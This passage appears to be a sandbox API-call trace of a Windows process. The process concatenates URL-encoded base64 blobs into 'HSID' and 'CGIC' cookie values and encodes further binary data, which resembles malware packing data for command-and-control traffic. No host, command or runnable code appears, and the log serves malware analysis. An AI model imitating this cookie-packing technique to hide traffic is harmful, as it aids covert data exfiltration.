(lpString="cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D") returned 372 [0143.795] lstrcatA (in: lpString1="", lpString2="HSID" | out: lpString1="HSID") returned="HSID" [0143.795] lstrcatA (in: lpString1="HSID", lpString2="=" | out: lpString1="HSID=") returned="HSID=" [0143.795] lstrcatA (in: lpString1="HSID=", lpString2="cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D" [0143.795] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D", lpString2=";" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;" [0143.796] GetProcessHeap () returned 0x440000 [0143.796] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caf2a0 | out: hHeap=0x440000) returned 1 [0143.796] GetProcessHeap () returned 0x440000 [0143.796] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca9e30 | out: hHeap=0x440000) returned 1 [0143.796] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;", lpString2="CGIC" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC" [0143.796] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC", lpString2="=" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=" [0143.796] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=", lpString2="gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D" [0143.796] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D", lpString2=";" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;" [0143.796] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.796] CryptBinaryToStringA (in: pbBinary=0x2caf090, cbBinary=0x100, dwFlags=0x40000001, pszString=0x0, pcchString=0x14f67c | out: pszString=0x0, pcchString=0x14f67c) returned 1 [0143.796] GetProcessHeap () returned 0x440000 [0143.796] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x159) returned 0x2ca9e30 [0143.796] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.796] CryptBinaryToStringA (in: pbBinary=0x2caf090, cbBinary=0x100, dwFlags=0x40000001, pszString=0x2ca9e30, pcchString=0x14f67c | out: pszString="rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz+pTz/bL+VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pcchString=0x14f67c) returned 1 [0143.797] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.797] lstrlenA (lpString="rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz+pTz/bL+VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==") returned 344 [0143.797] GetProcessHeap () returned 0x440000 [0143.797] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16f) returned 0x2caf2a0 [0143.797] StrCSpnA (lpStr="rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz+pTz/bL+VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 62 [0143.797] StrSpnA (psz="+pTz/bL+VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.797] StrCSpnA (lpStr="pTz/bL+VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 3 [0143.797] StrSpnA (psz="/bL+VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.797] StrCSpnA (lpStr="bL+VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 2 [0143.797] StrSpnA (psz="+VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.797] StrCSpnA (lpStr="VZhsmWoz2g2Xgb+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 14 [0143.797] StrSpnA (psz="+Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.797] StrCSpnA (lpStr="Fzfk12Yf3NU1xVj6c+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 17 [0143.797] StrSpnA (psz="+143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.797] StrCSpnA (lpStr="143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 167 [0143.797] StrSpnA (psz="+qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.797] StrCSpnA (lpStr="qbyG7ElLS4YvRojQ/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 16 [0143.798] StrSpnA (psz="/0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.798] StrCSpnA (lpStr="0o7MhHYSScah+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 12 [0143.798] StrSpnA (psz="+dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.798] StrCSpnA (lpStr="dAbg/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 4 [0143.798] StrSpnA (psz="/LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", pszSet="+/=") returned 1 [0143.798] StrCSpnA (lpStr="LnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg==", lpSet="+/=") returned 36 [0143.798] StrSpnA (psz="==", pszSet="+/=") returned 2 [0143.798] lstrlenA 